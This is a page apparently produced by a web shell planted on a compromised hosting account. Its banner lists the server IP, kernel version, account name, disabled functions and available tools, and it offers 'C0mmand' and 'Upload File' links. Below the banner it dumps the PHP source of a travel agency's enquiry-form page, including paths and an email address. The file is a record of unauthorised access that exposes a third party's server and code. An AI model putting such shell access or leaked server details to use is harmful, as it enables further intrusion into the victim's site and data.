Server IP : 103.53.40.154 / Your IP : 3.133.123.162 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/mail/../.spamassassin/../bittootour.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include_once('admin/config.php'); include_once('site-main-query.php'); function isAllowedMessage($message) { $allowedChars = '/^[a-zA-Z0-9,@. ]*$/'; return preg_match($allowedChars, $message); } if ($_SERVER["REQUEST_METHOD"] === "POST") { if (isset($_POST['submit'])) { $name = $_POST['name']; $phone = $_POST['phone']; $email = $_POST['email']; $message = $_POST['message']; date_default_timezone_set("Asia/Kolkata"); $currentTime = date("Y-m-d H:i:s"); $errors = array(); // Validate input if (empty($name)) { $errors[] = "Name field is required."; } elseif (!preg_match('/^[a-zA-Z ]+$/', $name)) { $errors[] = "Name can only contain alphabets."; } if (empty($email)) { $errors[] = "Email field is required."; } elseif (!filter_var($email, FILTER_VALIDATE_EMAIL)) { $errors[] = "Invalid email format."; } if (empty($phone)) { $errors[] = "Phone field is required."; } elseif (!preg_match('/^\d{10}$/', $phone)) { $errors[] = "Phone number should have exactly 10 digits."; } // Sanitize input $name = filter_var($name, FILTER_SANITIZE_STRING); $phone = filter_var($phone, FILTER_SANITIZE_NUMBER_INT); $email = filter_var($email, FILTER_SANITIZE_EMAIL); $message = htmlspecialchars($message, ENT_QUOTES, 'UTF-8'); // Check for potentially malicious content in the message if (!isAllowedMessage($message)) { $errors[] = "Your message contains potentially malicious content or disallowed characters."; } if (empty($errors)) { // Your existing code for successful submission $query = "INSERT INTO `tbl_queries` (`name`, `phone`, `email`, `message`, `datetime`) VALUES (?, ?, ?, ?, ?)"; $stmt = mysqli_prepare($db, $query); if ($stmt) { mysqli_stmt_bind_param($stmt, "sssss", $name, $phone, $email, $message, $currentTime); $result = mysqli_stmt_execute($stmt); mysqli_stmt_close($stmt); if ($result) { $sendmail=$data1["email"]; // $to = "digitalsaleem12@gmail.com"; $to = $sendmail; $subject = "New Query Submitted From $site_name Enquiry Page"; $emailMessage = "A new query has been submitted:\n\n"; $emailMessage .= "Name: $name\n"; $emailMessage .= "Phone: $phone\n"; $emailMessage .= "Email: $email\n"; $emailMessage .= "Message: $message\n"; $headers = "From: $email"; if (mail($to, $subject, $emailMessage, $headers)) { echo "<script> window.alert('Successfully Sent! We will contact you soon'); window.location.href = '$wspath' + 'contact.html'; </script>"; } else { echo "Error sending email."; } } else { $errors[] = "Error in processing your request. Please try again later."; } } else { $errors[] = "Error in preparing the statement."; } } else { // Display validation errors in an alert echo "<script> var errorMessage = '"; foreach ($errors as $error) { echo addslashes($error) . "\\n"; } echo "'; window.alert(errorMessage); </script>"; } } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <?php include 'top-link.php'; ?> <title>Bitto Tours & Travells</title> <style> .detail-image img{ box-shadow: 0 14px 28px rgba(0,0,0,0.25), 0 10px 10px rgba(0,0,0,0.22); border-radius:5px; } .para p{ text-align:justify; } </style> </head> <body> <?php include 'header.php'; ?> <div class="site-breadcrumb" style="background: url(assets/img/breadcrumb/01.jpg)"> <div class="container"> <h2 class="breadcrumb-title">Enquire Now</h2> <ul class="breadcrumb-menu"> <li><a href="<?php echo $wspath?>">Home</a></li> <li class="active">Enquire Now</li> </ul> </div> </div> <div class="service-area bg py-120"> <div class="container"> <div class="row"> <div class="col-lg-6 mx-auto"> <div class="site-heading text-center"> <span class="site-title-tagline">Services</span> <h2 class="site-title">Our Best Services For You</h2> <div class="heading-divider"></div> </div> </div> </div> <div class="row"> <div class="col-md-12 col-lg-6"> <div class="detail-image"> <img src="assets/images/enq.jpg" alt="<?php echo $site_name?>" title="<?php echo $site_name?>" style="width: 100%;"> </div> </div> <div class="col-lg-6 align-self-center"> <div class="contact-form"> <div class="contact-form-header"> <h2>Get In Touch</h2> <p>It is a long established fact that a reader will be distracted by the readable content of a page randomised words slightly when looking at its layout. </p> </div> <form method="post" id="contact-form"> <div class="row"> <div class="col-md-6"> <div class="form-group"> <input type="text" class="form-control" name="name" placeholder="Your Name" required> </div> </div> <div class="col-md-6"> <div class="form-group"> <input type="email" class="form-control" name="email" placeholder="Your Email" required> </div> </div> </div> <div class="form-group"> <input type="tel" class="form-control" name="phone" placeholder="Your Phone No" required> </div> <div class="form-group"> <textarea name="message" cols="30" rows="5" class="form-control" placeholder="Write Your Message"></textarea> </div> <button type="submit" class="theme-btn" name="submit">Send Message <i class="far fa-paper-plane"></i></button> </form> </div> </div> </div> </div> </div> </div> </div> <?php include 'about-book.php'; ?> <?php include 'footer.php'; ?> </body> </html>